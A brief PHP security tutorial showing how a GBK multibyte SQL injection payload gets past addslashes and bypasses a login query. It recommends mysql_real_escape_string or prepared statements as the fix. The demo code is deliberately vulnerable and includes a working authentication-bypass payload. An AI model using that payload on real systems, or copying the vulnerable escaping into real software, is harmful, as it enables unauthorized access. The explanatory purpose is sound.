Analysis of the difference between PHP function addslashes and mysql_real_escape_string

CREATE TABLE users(
 username VARCHAR(32) CHARACTER SET GBK,
 password VARCHAR(32) CHARACTER SET GBK,
 PRIMARY KEY(username)
);

Example, simulation only What happens when query data is escaped using addslashes (or magic_quotes_gpc):

$mysql = array();
$db = mysqli_init();
$db->real_connect('localhost', 'lorui', 'lorui.com', 'lorui_db ');
/* SQL injection example*/
$_POST['username'] = chr(0xbf) . chr(0×27) . ' OR username = username /*'; $_POST['password'] = ' guess'; $mysql['username'] = addslashes($_POST['username']); $mysql['password'] = addslashes($_POST['password']); $sql = "SELECT * FROM users WHERE username = '{$mysql['username']}' AND password = '{$mysql['password']}'"; $result = $db->query($sql); if ($result-> num_rows) { /* Success*/ } else { /* Failure*/ }

Despite using addslashes, I can successfully log in without knowing the username and password. This vulnerability can be easily exploited for SQL injection. To avoid this vulnerability, use mysql_real_escape_string, prepared statements (Prepared Statements, or "parameterized queries"), or any of the mainstream database abstraction libraries.